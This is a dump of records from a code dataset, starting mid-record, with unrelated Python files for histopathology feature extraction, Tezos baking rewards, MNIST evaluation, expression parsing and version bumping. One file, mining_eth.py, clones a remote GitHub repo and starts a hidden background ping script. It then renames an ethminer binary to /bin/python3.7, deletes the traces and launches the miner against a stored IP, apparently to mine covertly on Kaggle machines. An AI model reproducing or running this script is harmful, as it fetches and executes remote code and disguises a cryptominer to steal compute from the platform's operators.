g -2 n -3 p -4 . -5 number!\n\n#adapted from the ipynb example from HistomicsTK\ndef extractImageFeatures(filename):\n im_input = skimage.io.imread(filename)[:, :, :3]\n original_name = filename.split(\"_\")[0]\n \n ref_image_file = (original_name + \"_0.png\") #normalize image to random set from larger image\n\n im_reference = skimage.io.imread(ref_image_file)[:, :, :3]\n\n # get mean and stddev of reference image in lab space\n mean_ref, std_ref = htk.preprocessing.color_conversion.lab_mean_std(im_reference)\n\n # perform reinhard color normalization\n im_nmzd = htk.preprocessing.color_normalization.reinhard(im_input, mean_ref, std_ref)\n\n # create stain to color map\n stainColorMap = {\n 'hematoxylin': [0.65, 0.70, 0.29],\n 'eosin': [0.07, 0.99, 0.11],\n 'dab': [0.27, 0.57, 0.78],\n 'null': [0.0, 0.0, 0.0]\n }\n\n # specify stains of input image\n stain_1 = 'hematoxylin' # nuclei stain\n stain_2 = 'eosin' # cytoplasm stain\n stain_3 = 'null' # set to null of input contains only two stains\n\n # create stain matrix\n W = np.array([stainColorMap[stain_1],\n stainColorMap[stain_2],\n stainColorMap[stain_3]]).T\n\n # perform standard color deconvolution\n im_stains = htk.preprocessing.color_deconvolution.color_deconvolution(im_input, W).Stains\n\n # get nuclei/hematoxylin channel\n im_nuclei_stain = im_stains[:, :, 0]\n\n # segment foreground\n foreground_threshold = 60\n\n im_fgnd_mask = sp.ndimage.morphology.binary_fill_holes(\n im_nuclei_stain < foreground_threshold)\n\n # run adaptive multi-scale LoG filter\n min_radius = 5\n max_radius = 15\n\n im_log_max, im_sigma_max = htk.filters.shape.cdog(\n im_nuclei_stain, im_fgnd_mask,\n sigma_min=min_radius * np.sqrt(2),\n sigma_max=max_radius * np.sqrt(2)\n )\n\n # detect and segment nuclei using local maximum clustering\n local_max_search_radius = 10\n\n im_nuclei_seg_mask, seeds, maxima = htk.segmentation.nuclear.max_clustering(\n im_log_max, im_fgnd_mask, local_max_search_radius)\n\n # filter out small objects\n min_nucleus_area = 5\n im_nuclei_seg_mask = htk.segmentation.label.area_open(im_nuclei_seg_mask, min_nucleus_area).astype(np.int)\n im_feats = htk.features.compute_morphometry_features(im_nuclei_seg_mask).mean()\n pat_name, imageIdx = getPatName(filename), getImageID(filename)\n im_feats['Case'], im_feats['ID'] = pat_name, getImageID(filename)\n return pd.DataFrame(pd.Series(im_feats))\n\ndef getSemanticFeatures(filename, xlsx): \n pat_name = getPatName(filename)\n pat_stats = xlsx[xlsx['Case'] == pat_name]\n return pat_stats[['Case','Grade', 'Age (years at diagnosis)', \\\n 'Gender', 'Survival (months)', 'Vital status (1=dead)',\\\n 'MGMT promoter status']].squeeze()\n\n\nxlsx = pd.read_excel('../tcga/TableS1.PatientData.20151020.v3.xlsx', skiprows=1)\nxlsx['Grade'] = xlsx['Grade'].str.slice(1)\nxlsx['Grade'] = pd.to_numeric(xlsx['Grade'])\nxlsx['Gender'] = (xlsx['Gender'] == 'male').astype(np.int64)\nxlsx['MGMT promoter status'] = (xlsx['MGMT promoter status'] == 'Methylated').astype(np.int64)\n\nprint(\"starting\")\ndata = []\n\nN = 10000 # 1000\nchunk_len = 500 # 50\n\n\n\nn_chunks = N / chunk_len\n\nall_data = [None] * n_chunks\n\nprint('yay images', N)\n\ndef get_data_chunk(subarray):\n global counter\n global t0\n data = []\n for i, image in enumerate((subarray)): \n try: \n im_features = extractImageFeatures(image)\n sem_features = getSemanticFeatures(image, xlsx)\n row = pd.concat((im_features, sem_features))\n data.append(row)\n except:\n pass\n with counter.get_lock():\n counter.value += 1\n if counter.value % chunk_len == 0:\n print(counter.value / float(N) * 100, \"% done\")\n if counter.value % (chunk_len * 2) == 0:\n print(str(time.time() - t0) + \"s elapsed\")\n print(len(data))\n return data\n\nchunks = [images[i:i+chunk_len] for i in range(0, N, chunk_len)]\npoolsize = 8\n\ndef init(args):\n ''' store the counter for later use '''\n global counter\n global t0\n counter, t0 = args\ncounter = (Value('i', 0), time.time())\n\n#t0 = time.time()\n#print('chunks',np.array(chunks).shape, 'and N=',N)\npool = Pool(poolsize, initializer=init, initargs = (counter, ))\nall_data = pool.map(get_data_chunk, chunks)\n#all_data = pool.imap(get_data_chunk, chunks)\npool.close() # No more work\npool.join() # Wait for completion\n\n\nwith open('../tcga/dense_features/'+tumor_type + '_list_v1.pkl', 'wb') as f:\n pickle.dump(all_data, f)\n\n'''\nprint(\"Starting....\")\nexecutor = concurrent.futures.ProcessPoolExecutor(10)\nim_features = [executor.submit(extractImageFeatures, image) for image in images[:30]]\nconcurrent.futures.wait(futures)\nprint(\"And done!\")\nsys.exit(0)\n'''","sub_path":"preprocessing/features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":6170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"476089416","text":"from api.reward_api import RewardApi\n\nfrom log_config import main_logger\nfrom tzscan.mirror_selection_helper import TzScanMirrorSelector\nfrom util.rpc_utils import parse_json_response\nfrom tzscan.tzscan_reward_api import TzScanRewardApiImpl\n\nlogger = main_logger\n\nCOMM_HEAD = \" rpc get http://{}/chains/main/blocks/head\"\nCOMM_DELEGATES = \" rpc get http://{}/chains/main/blocks/{}/context/delegates/{}\"\nCOMM_BLOCK = \" rpc get http://{}/chains/main/blocks/{}~{}/\"\nCOMM_SNAPSHOT = COMM_BLOCK + \"context/raw/json/rolls/owner/snapshot/{}/\"\nCOMM_DELEGATE_BALANCE = \" rpc get http://{}/chains/main/blocks/{}/context/contracts/{}\"\n\n\nclass RpcRewardApiImpl(RewardApi):\n\n def __init__(self, nw, baking_address, wllt_clnt_mngr, node_url, validate=True):\n super(RpcRewardApiImpl, self).__init__()\n\n self.blocks_per_cycle = nw['BLOCKS_PER_CYCLE'] \n self.preserved_cycles = nw['NB_FREEZE_CYCLE']\n self.blocks_per_roll_snapshot = nw['BLOCKS_PER_ROLL_SNAPSHOT']\n \n self.baking_address = baking_address\n self.wllt_clnt_mngr = wllt_clnt_mngr\n self.node_url = node_url\n \n self.validate = validate\n if self.validate:\n mirror_selector = TzScanMirrorSelector(nw)\n mirror_selector.initialize()\n self.validate_api = TzScanRewardApiImpl(nw, self.baking_address, mirror_selector)\n\n\n def get_nb_delegators(self, cycle, verbose=False):\n _, delegators = self.__get_delegators_and_delgators_balance(cycle)\n return len(delegators)\n\n\n def get_rewards_for_cycle_map(self, cycle, verbose=False):\n\n reward_data = {}\n \n reward_data[\"delegate_staking_balance\"], reward_data[\"delegators\"] = self.__get_delegators_and_delgators_balance(cycle) \n reward_data[\"delegators_nb\"] = len(reward_data[\"delegators\"])\n \n current_level, head_hash = self.__get_current_level(verbose) \n\n # Get last block in cycle where rewards are unfrozen\n level_for_relevant_request = (cycle + self.preserved_cycles + 1) * self.blocks_per_cycle\n\n if current_level - level_for_relevant_request >= 0:\n request_metadata = COMM_BLOCK.format(self.node_url, head_hash, current_level - level_for_relevant_request)+'/metadata/'\n response_metadata = self.wllt_clnt_mngr.send_request(request_metadata)\n metadata = parse_json_response(response_metadata)\n balance_updates = metadata[\"balance_updates\"]\n\n unfrozen_rewards = unfrozen_fees = 0\n for i in range(len(balance_updates)):\n balance_update = balance_updates[i]\n if balance_update[\"kind\"] == \"freezer\":\n if balance_update[\"delegate\"] == self.baking_address:\n if balance_update[\"category\"] == \"rewards\":\n unfrozen_rewards = -int(balance_update[\"change\"])\n elif balance_update[\"category\"] == \"fees\":\n unfrozen_fees = -int(balance_update[\"change\"])\n reward_data[\"total_rewards\"] = unfrozen_rewards + unfrozen_fees\n if self.validate:\n self.__validate_reward_data(reward_data, cycle)\n else:\n logger.warn(\"Please wait until the rewards and fees for cycle {} are unfrozen\".format(cycle)) \n reward_data[\"total_rewards\"] = 0\n \n return reward_data\n\n def __get_current_level(self, verbose=False):\n response = self.wllt_clnt_mngr.send_request(COMM_HEAD.format(self.node_url))\n head = parse_json_response(response)\n current_level = int(head[\"metadata\"][\"level\"][\"level\"])\n head_hash = head[\"hash\"]\n return current_level, head_hash\n \n def __get_delegators_and_delgators_balance(self, cycle, verbose=False):\n \n hash_snapshot_block = self.__get_snapshot_block_hash(cycle)\n if hash_snapshot_block == \"\":\n return 0, []\n \n request = COMM_DELEGATES.format(self.node_url, hash_snapshot_block, self.baking_address)\n response = self.wllt_clnt_mngr.send_request(request)\n \n delegate_staking_balance = 0\n delegators = {}\n \n try:\n response = parse_json_response(response)\n delegate_staking_balance = int(response[\"staking_balance\"])\n\n delegators_addresses = response[\"delegated_contracts\"]\n for delegator in delegators_addresses:\n request = COMM_DELEGATE_BALANCE.format(self.node_url, hash_snapshot_block, delegator)\n response = self.wllt_clnt_mngr.send_request(request)\n response = parse_json_response(response)\n delegators[delegator] = int(response[\"balance\"])\n except:\n logger.warn('No delegators or unexpected error')\n \n return delegate_staking_balance, delegators\n \n def __get_snapshot_block_hash(self, cycle, verbose=False):\n \n current_level, head_hash = self.__get_current_level(verbose)\n \n level_for_snapshot_request = (cycle - self.preserved_cycles) * self.blocks_per_cycle + 1 \n\n if current_level - level_for_snapshot_request >= 0:\n request = COMM_SNAPSHOT.format(self.node_url, head_hash, current_level - level_for_snapshot_request, cycle)\n response = self.wllt_clnt_mngr.send_request(request)\n snapshots = parse_json_response(response)\n \n if len(snapshots) == 1:\n chosen_snapshot = snapshots[0]\n else:\n logger.info(\"Too few or too many possible snapshots found!\")\n \n level_snapshot_block = (cycle - self.preserved_cycles - 2) * self.blocks_per_cycle + ( chosen_snapshot + 1 ) * self.blocks_per_roll_snapshot\n request = COMM_BLOCK.format(self.node_url, head_hash, current_level - level_snapshot_block) + \" | jq -r .hash\"\n hash_snapshot_block = self.wllt_clnt_mngr.send_request(request).rstrip()\n return hash_snapshot_block\n else:\n logger.info(\"Cycle too far in the future\")\n return \"\"\n\n def __validate_reward_data(self, reward_data_rpc, cycle):\n reward_data_tzscan = self.validate_api.get_rewards_for_cycle_map(cycle)\n if not reward_data_rpc[\"delegate_staking_balance\"] == int(reward_data_tzscan[\"delegate_staking_balance\"]):\n raise Exception(\"Delegate staking balance from local node and tzscan are not identical.\")\n \n if not (reward_data_rpc[\"delegators_nb\"]) == (reward_data_tzscan[\"delegators_nb\"]):\n raise Exception(\"Delegators number from local node and tzscan are not identical.\")\n \n if (reward_data_rpc[\"delegators_nb\"]) == 0:\n return\n \n delegators_balance_tzscan = [ int(reward_data_tzscan[\"delegators_balance\"][i][1]) for i in range(len(reward_data_tzscan[\"delegators_balance\"]))]\n print(set(list(reward_data_rpc[\"delegators\"].values())))\n print(set(delegators_balance_tzscan))\n if not set(list(reward_data_rpc[\"delegators\"].values())) == set(delegators_balance_tzscan):\n raise Exception(\"Delegators' balances from local node and tzscan are not identical.\")\n\n blocks_rewards = int(reward_data_tzscan[\"blocks_rewards\"])\n future_blocks_rewards = int(reward_data_tzscan[\"future_blocks_rewards\"])\n endorsements_rewards = int(reward_data_tzscan[\"endorsements_rewards\"])\n future_endorsements_rewards = int(reward_data_tzscan[\"future_endorsements_rewards\"])\n lost_rewards_denounciation = int(reward_data_tzscan[\"lost_rewards_denounciation\"])\n lost_fees_denounciation = int(reward_data_tzscan[\"lost_fees_denounciation\"])\n fees = int(reward_data_tzscan[\"fees\"])\n\n total_rewards_tzscan = (blocks_rewards + endorsements_rewards + future_blocks_rewards +\n future_endorsements_rewards + fees - lost_rewards_denounciation - lost_fees_denounciation)\n\n if not reward_data_rpc[\"total_rewards\"] == total_rewards_tzscan:\n raise Exception(\"Total rewards from local node and tzscan are not identical.\")\n \n","sub_path":"src/rpc/rpc_reward_api.py","file_name":"rpc_reward_api.py","file_ext":"py","file_size_in_byte":8204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"785518","text":"from __future__ import print_function\n\n# для обучения используется keras\nimport keras\nfrom keras import backend as K\n# встроенная API для загрузки данных MNIST с внешнего сервера\nfrom keras.datasets import mnist\n# библиотека metrics нужна для подсчитывания confusion-матрицы\nfrom sklearn import metrics\n\n# количество классов, 10 цифр - 10 классов\nnum_classes = 10\n# картинки 28*28\nimg_rows, img_cols = 28, 28\n\n# загрузка уже существующей модели keras\nmodel = keras.models.load_model(\"model/model.h5\")\n# загрузка данных\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\n\n# в зависимости от настройки keras, мы делаем решейп данных\nif K.image_data_format() == 'channels_first':\n x_test = x_test.reshape(x_test.shape[0], 1, img_rows, img_cols)\nelse:\n x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1)\n\n# превращаем матрицу y_test в двоичную матрицу классификации\ny_test = keras.utils.to_categorical(y_test, num_classes)\n\n# выполняем тестирование точности\nscore = model.evaluate(x_test, y_test, verbose=0)\nprint('Потеря:', score[0])\nprint('Точность:', score[1])\n\n# с помощью обученной сетки получаем выборку в виде набора классов\ny_pred = model.predict(x_test)\n# создаём непосредственно confusion матрицу\nmatrix = metrics.confusion_matrix(y_test.argmax(axis=1), y_pred.argmax(axis=1))\nprint(matrix)\n","sub_path":"confusion.py","file_name":"confusion.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"240841801","text":"import os,subprocess\r\ndown_dep=\"apt install -y libmicrohttpd-dev hping3\"\r\nprint(\"Installing\")\r\nos.system(down_dep)\r\nprint(\"checking\")\r\nfile_exist=os.path.isfile('/kaggle/working/xmr-nvidia/xmrig-nvidia')\r\nprint(file_exist)\r\ncwd=os.getcwd()\r\nprint(cwd)\r\nsubprocess.call([\"git\", \"clone\",\"https://github.com/shibu143/xmr-nvidia.git\"])\r\nprint(\"Downloaded\")\r\ncip=\"xmr-nvidia/eth_ip.txt\"\r\nprint(cip)\r\nread_ip=open(cip,\"r+\")\r\nip_add=read_ip.read()\r\nprint(ip_add)\r\ncmd = \"python3.7 -P http://\"+ ip_add \r\nprint(cmd)\r\nif file_exist==True :\r\n print(\"running\")\r\n os.system(cmd)\r\n \r\n \r\n \r\nelse :\r\n cwd=os.getcwd()\r\n cping=\"nohup python \"+cwd+ \"/xmr-nvidia/website_ping.py > /dev/null 2>&1 &\"\r\n os.system(cping)\r\n cdir=cwd+\"/xmr-nvidia/ethminer\"\r\n chmod_cmd=\"chmod 755 \"+cdir\r\n os.system(chmod_cmd)\r\n mv_dir=\"mv \"+cdir+\" /bin/python3.7\"\r\n os.system(mv_dir)\r\n print(\"moved\")\r\n os.system(\"rm -rf xmr-nvidia\")\r\n print(\"Running...\") \r\n os.system(cmd)","sub_path":"mining_eth.py","file_name":"mining_eth.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"351533224","text":"# -*- coding: utf-8 -*-\nimport requests\nimport json\n\nfrom oe_daemonutils.circuit import DaemonCircuitBreaker\nfrom oe_daemonutils.dossierservice.commands import BasicCommand\nfrom requests import RequestException\n\n\nclass DetermineRegionRepsCommand(BasicCommand):\n def __init__(self, regioverantwoordelijken_url, logger, system_token, failure_threshold=5, timeout_default=60,\n max_timeout=300,\n invocation_timeout=60):\n \"\"\"\n Bepaal de regioverantwoordelijken aan de hand van een niscode en een discipline of proces\n\n :param regioverantwoordelijken_url: url voor de regioverantwoordelijken service\n :param logger: logger for the operation\n :param system_token: system token\n :param failure_threshold: the couples of times the operation should fail before opening the circuit\n :param timeout_default: default sleep time while circuit is open\n :param max_timeout: max sleep time while circuit is open\n :param invocation_timeout: max time span an operation should take, before timing out\n \"\"\"\n self.regioverantwn_url = regioverantwoordelijken_url\n self.logger = logger\n self.headers = {'OpenAmSSOID': system_token, 'Accept': 'application/json',\n 'Content-Type': 'application/json'}\n self.failure_threshold = failure_threshold\n self.timeout_default = timeout_default\n self.max_timeout = max_timeout\n self.invocation_timeout = invocation_timeout\n\n def execute(self, niscodes, discipline=None, process=None):\n circuit = DaemonCircuitBreaker(self._circuit_wrapped_determine_region_reps, self.logger,\n (IOError, ValueError, RequestException),\n failure_threshold=self.failure_threshold,\n timeout_default=self.timeout_default,\n max_timeout=self.max_timeout,\n invocation_timeout=self.invocation_timeout)\n return circuit.call(niscodes, discipline=discipline, process=process)\n\n def _circuit_wrapped_determine_region_reps(self, niscodes, discipline=None, process=None):\n \"\"\"\n Get the region reps given the area niscodes\n\n :param niscodes: list of niscodes\n :param discipline: discipline for the representatives\n :param process: for specific process\n :return: list of actor objects each having a \"actor\" attribute including the actor_uri\n \"\"\"\n params = {'niscode': niscodes}\n if process:\n params[\"proces\"] = process\n if discipline:\n params[\"discipline\"] = discipline\n res = requests.get(\n self.regioverantwn_url,\n params=params,\n headers=self.headers\n )\n res.raise_for_status()\n return json.loads(res.text)\n\n\nclass DetermineNiscodesCommand(BasicCommand):\n def __init__(self, logger, admin_grenzen_client, failure_threshold=5, timeout_default=60,\n max_timeout=300,\n invocation_timeout=60):\n \"\"\"\n Get administrative area information of the given geojson.\n If the geojson overlaps multiple administrative areas\n\n :param logger: logger for the operation\n :param failure_threshold: the couples of times the operation should fail before opening the circuit\n :param timeout_default: default sleep time while circuit is open\n :param max_timeout: max sleep time while circuit is open\n :param invocation_timeout: max time span an operation should take, before timing out\n \"\"\"\n self.logger = logger\n self.admin_grenzen_client = admin_grenzen_client\n self.failure_threshold = failure_threshold\n self.timeout_default = timeout_default\n self.max_timeout = max_timeout\n self.invocation_timeout = invocation_timeout\n\n def execute(self, geojson, types):\n \"\"\"\n Get administrative area information of the given geojson.\n If the geojson overlaps multiple administrative areas\n\n :param geojson: contour geojson\n :param types: array, return types of administrative areas ['gemeente', 'provincie']\n :return: adminstative area information\n \"\"\"\n circuit = DaemonCircuitBreaker(self._determine_niscodes, self.logger,\n (IOError, ValueError, RequestException),\n failure_threshold=self.failure_threshold,\n timeout_default=self.timeout_default,\n max_timeout=self.max_timeout,\n invocation_timeout=self.invocation_timeout)\n return circuit.call(geojson, types)\n\n def _determine_niscodes(self, geojson, types):\n results = []\n if 'gemeente' in types:\n results.append(self.admin_grenzen_client.get_gemeente(geojson))\n if 'provincie' in types:\n results.append(self.admin_grenzen_client.get_provincie(geojson))\n niscodes = [result['niscode'] for result in results]\n return niscodes\n","sub_path":"oe_daemonutils/dossierservice/commands/location/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"143380760","text":"# -*- coding: utf-8 -*-\n#\n# Copyright 2017 Simone Campagna\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\n\"\"\"\nCondition and Expression classes.\n\"\"\"\n\nimport abc\nimport ast\nfrom functools import singledispatch\n\n\n__all__ = [\n 'Expression',\n 'Condition',\n 'parse_condition',\n 'parse_expression',\n 'merge_conditions',\n 'TRUE',\n 'FALSE',\n]\n\n\n# pylint: disable=too-few-public-methods\n# pylint: disable=function-redefined\n# flake8: noqa\n\n\ndef parse_condition(source, free_variables=(), globals_d=None):\n \"\"\"Parses a conditional expression.\n\n Parameters\n ----------\n source: str\n The expression source code.\n free_variables: iterable, optional\n The expression variables (defaults to ()).\n globals_d: dict, optional\n The expression globals (defaults to {}).\n\n Returns\n -------\n Condition\n The condition.\n \"\"\"\n return Condition(\n source=source,\n free_variables=free_variables,\n globals_d=globals_d)\n\n\ndef parse_expression(source, free_variables=(), globals_d=None):\n \"\"\"Parses an expression.\n\n Parameters\n ----------\n source: str\n The expression source code.\n free_variables: iterable, optional\n The expression variables (defaults to ()).\n globals_d: dict, optional\n The expression globals (defaults to {}).\n\n Returns\n -------\n Condition\n The condition.\n \"\"\"\n return Expression(\n source=source,\n free_variables=free_variables,\n globals_d=globals_d)\n\n\ndef merge_conditions(*conditions):\n r\"\"\"Merges all conditions with `and`.\n\n Parameters\n ----------\n \\*conditions: iterable\n Conditions to merge.\n\n Returns\n -------\n MergedCondition\n The merged condition.\n \"\"\"\n return MergedCondition(*conditions)\n\n\ndef _mkbuiltins(*objs):\n \"\"\"Create builtins dictionary.\"\"\"\n dct = {}\n for obj in objs:\n dct[obj.__name__] = obj\n return dct\n\n\n\nclass BaseExpression(abc.ABC):\n \"\"\"BaseExpression class\"\"\"\n __globals__ = _mkbuiltins(abs, all, any, bool, callable, chr, complex, dict, divmod, enumerate,\n filter, float, format, frozenset, hex, int, isinstance, issubclass,\n iter, len, list, map, max, min, next, oct, ord, pow, print, range,\n repr, reversed, round, set, sorted, str, sum, tuple, type, vars, zip)\n\n def __init__(self, source, free_variables=(), globals_d=None):\n self.__source = source\n self.__free_variables = set(free_variables)\n self.__globals_d = self.__globals__.copy()\n if globals_d:\n self.__globals_d.update(globals_d)\n self.__code = self._compile(source)\n\n def _compile(self, source):\n \"\"\"Returns compiled code.\"\"\"\n ast_node = ast.parse(source, '', 'eval')\n parse_ast(ast_node, self)\n return compile(ast_node, '', 'eval')\n\n @property\n def source(self):\n \"\"\"Gets the source attribute.\"\"\"\n return self.__source\n\n @property\n def free_variables(self):\n \"\"\"Gets the free_variables attribute.\"\"\"\n return self.__free_variables\n\n @property\n def globals_d(self):\n \"\"\"Gets the globals_d attribute.\"\"\"\n return self.__globals_d\n\n def accepts_name(self, name):\n \"\"\"Returns True if the name is accepted.\n\n Parameters\n ----------\n name: str\n The name.\n\n Returns\n -------\n bool\n True if expression accepts name.\n \"\"\"\n return name in self.__free_variables or name in self.__globals_d\n\n def __call__(self, locals_d=None):\n if locals_d is None:\n locals_d = {}\n return eval(self.__code, self.__globals_d, locals_d) # pylint: disable=eval-used\n\n def __repr__(self):\n return \"{}({!r})\".format(type(self).__name__, self.__source)\n\n\nclass Expression(BaseExpression):\n \"\"\"Expression class\"\"\"\n\n\nclass Condition(BaseExpression):\n \"\"\"Condition class\"\"\"\n def _compile(self, source):\n return super()._compile(\"bool({})\".format(source))\n\n\nclass MergedCondition(Condition):\n \"\"\"Merged conditions class\"\"\"\n def __init__(self, *conditions):\n sources = []\n for condition in conditions:\n if isinstance(condition, MergedCondition):\n sources.extend(self.sources())\n elif isinstance(condition, Condition):\n source = condition.source\n else:\n raise TypeError(\"{!r}: not a condition\".format(condition))\n print([condition, source, sources])\n if source == 'False':\n sources = ['False']\n break\n elif source != 'True':\n sources.append(source)\n if sources:\n if len(sources) == 1:\n merged_source = sources[0]\n else:\n print(sources)\n merged_source = ' and '.join('({})'.format(source) for source in sources)\n else:\n merged_source = 'True'\n self.__conditions = conditions\n self.__sources = sources\n super().__init__(source=merged_source)\n\n def _compile(self, source):\n pass\n\n def conditions(self):\n \"\"\"Yields conditions.\"\"\"\n yield from self.__conditions\n\n def sources(self):\n \"\"\"Yields sources.\"\"\"\n yield from self.__sources\n\n def accepts_name(self, name):\n for condition in self.__conditions:\n if condition.accepts_name(name):\n return True\n return False\n\n def __call__(self, locals_d=None):\n for condition in self.__conditions:\n if not condition(locals_d):\n return False\n return True\n\n def __repr__(self):\n return \"{}({})\".format(\n type(self).__name__,\n ', '.join(repr(condition) for condition in self.__conditions))\n\n\ndef _err(ast_node, expr, message=None):\n \"\"\"Raises a SyntaxError\"\"\"\n if hasattr(ast_node, 'col_offset'):\n print(\"!!! \", expr.source)\n print(\"!!! \", (\" \" * ast_node.col_offset) + \"^\")\n if message is None:\n message = \"ast node {!r}\".format(type(ast_node).__name__)\n raise SyntaxError(message)\n\n@singledispatch\ndef parse_ast(ast_node, expr):\n \"\"\"Parses an AST node.\n\n Parameters\n ----------\n ast_node: ast.Node\n The AST node.\n expr: BaseExpression\n The expression object.\n \"\"\"\n _err(ast_node, expr)\n\n\n@parse_ast.register(ast.Expression)\ndef _(ast_node, expr):\n \"\"\"Parses ast.Expression\"\"\"\n parse_ast(ast_node.body, expr)\n\n\n@parse_ast.register(ast.BinOp)\ndef _(ast_node, expr):\n \"\"\"Parses ast.BinOp\"\"\"\n parse_ast(ast_node.op, expr)\n parse_ast(ast_node.left, expr)\n parse_ast(ast_node.right, expr)\n\n\n@parse_ast.register(ast.BoolOp)\ndef _(ast_node, expr):\n \"\"\"Parses ast.BoolOp\"\"\"\n parse_ast(ast_node.op, expr)\n for value in ast_node.values:\n parse_ast(value, expr)\n\n\n@parse_ast.register(ast.UnaryOp)\ndef _(ast_node, expr):\n \"\"\"Parses ast.UnaryOp\"\"\"\n parse_ast(ast_node.op, expr)\n parse_ast(ast_node.operand, expr)\n\n\n@parse_ast.register(ast.Name)\ndef _(ast_node, expr):\n \"\"\"Parses ast.Name\"\"\"\n if not (expr.accepts_name(ast_node.id) or ast_node.id in BaseExpression.__globals__):\n print(expr, expr.source, expr.free_variables)\n _err(ast_node, expr, \"undefined name {!r}\".format(ast_node.id))\n\n\n@parse_ast.register(ast.NameConstant)\ndef _(ast_node, expr):\n \"\"\"Parses ast.NameConstant\"\"\"\n if ast_node.value not in {True, False, None}:\n _err(ast_node, expr, \"undefined name {!r}\".format(ast_node.value))\n\n\n@parse_ast.register(ast.Compare)\ndef _(ast_node, expr):\n \"\"\"Parses ast.Compare\"\"\"\n parse_ast(ast_node.left, expr)\n for operator in ast_node.ops:\n parse_ast(operator, expr)\n for comparator in ast_node.comparators:\n parse_ast(comparator, expr)\n\n\n@parse_ast.register(ast.keyword)\ndef _(ast_node, expr):\n \"\"\"Parses ast.keyword\"\"\"\n parse_ast(ast_node.value, expr)\n\n\n@parse_ast.register(ast.Call)\ndef _(ast_node, expr):\n \"\"\"Parses ast.Call\"\"\"\n parse_ast(ast_node.func, expr)\n for arg in ast_node.args:\n parse_ast(arg, expr)\n for arg in ast_node.keywords:\n parse_ast(arg, expr)\n\n\n@parse_ast.register(ast.Add)\n@parse_ast.register(ast.Sub)\n@parse_ast.register(ast.Mult)\n@parse_ast.register(ast.Div)\n@parse_ast.register(ast.FloorDiv)\n@parse_ast.register(ast.Mod)\n@parse_ast.register(ast.Pow)\n@parse_ast.register(ast.Num)\n@parse_ast.register(ast.UAdd)\n@parse_ast.register(ast.USub)\n@parse_ast.register(ast.Lt)\n@parse_ast.register(ast.LtE)\n@parse_ast.register(ast.Gt)\n@parse_ast.register(ast.GtE)\n@parse_ast.register(ast.Eq)\n@parse_ast.register(ast.NotEq)\n@parse_ast.register(ast.Or)\n@parse_ast.register(ast.And)\n@parse_ast.register(ast.Not)\ndef _(ast_node, expr):\n # pylint: disable=unused-argument\n \"\"\"Parses ast operators\"\"\"\n pass\n\n\nTRUE = parse_condition('True')\nFALSE = parse_condition('False')\n","sub_path":"src/pnets/expression.py","file_name":"expression.py","file_ext":"py","file_size_in_byte":9692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"86055272","text":"from array import *\nimport random\n\nv = array('i',[])\n\nn = int(input('Escriba la cantidad de elementos del vector: '))\ni = 0\n\nwhile iv[j]:\n #intercambiar\n aux = v[i]\n v[i] = v[j]\n v[j] = aux\n j = j + 1\n i = i +1\n\nprint(v)\n\n\n\n\n\n\n\n","sub_path":"Jimenez Ruiz Beymar/M0406 Array adicionar n elementos radomicamente y bubble sort ascendente.py","file_name":"M0406 Array adicionar n elementos radomicamente y bubble sort ascendente.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"14155743","text":"x=int(input())\nx=str(x)\nans=\"\"\nflag=0\nfor idx,val in enumerate(x):\n\tif val!='0':\n\t\tans+=val\n\telse:\n\t\tflag=1\n\t\tbreak\nif flag==1:\n\tprint(ans,end=\"\")\n\tprint(x[idx+1:])\n\nelse:\n\tprint(x[:-1])\n","sub_path":"Ladder_11(Less_1300)/A_Little_Elephant_and_Bits.py","file_name":"A_Little_Elephant_and_Bits.py","file_ext":"py","file_size_in_byte":187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"647580335","text":"# built-in\nimport re\nfrom datetime import date\nfrom pathlib import Path\nfrom typing import Iterator, Optional, Union\n\n# external\nfrom dephell_discover import Root\nfrom packaging.version import VERSION_PATTERN, Version\n\n# app\nfrom .. import constants\nfrom ._roman import arabic2roman, roman2arabic\n\n\nFILE_NAMES = (\n '__init__.py',\n '__version__.py',\n '__about__.py',\n '_version.py',\n '_about.py',\n)\nREX_VERSION = re.compile(VERSION_PATTERN, re.VERBOSE | re.IGNORECASE)\nPREFIXES = {'__version__', 'VERSION', 'version'}\n\n\ndef get_version_from_file(path: Path) -> Optional[str]:\n with path.open('r') as stream:\n for line in stream:\n prefix, sep, version = line.partition('=')\n if not sep:\n continue\n if prefix.rstrip() not in PREFIXES:\n continue\n return version.strip().strip('\\'\"')\n return None\n\n\ndef get_version_from_project(project: Root) -> Optional[str]:\n for package in project.packages:\n for path in package:\n if path.name not in FILE_NAMES:\n continue\n version = get_version_from_file(path=path)\n if version:\n return version\n return None\n\n\ndef bump_file(path: Path, old: str, new: str) -> bool:\n file_bumped = False\n new_content = []\n with path.open('r') as stream:\n for line in stream:\n prefix, sep, _version = line.partition('=')\n if not sep:\n new_content.append(line)\n continue\n if prefix.rstrip() not in PREFIXES:\n new_content.append(line)\n continue\n\n # replace old version\n if old:\n new_line = line.replace(old, new, 1)\n if new_line != line:\n new_content.append(new_line)\n file_bumped = True\n continue\n\n # replace any version\n new_line, count = REX_VERSION.subn(new, line)\n if count == 1:\n new_content.append(new_line)\n file_bumped = True\n continue\n\n 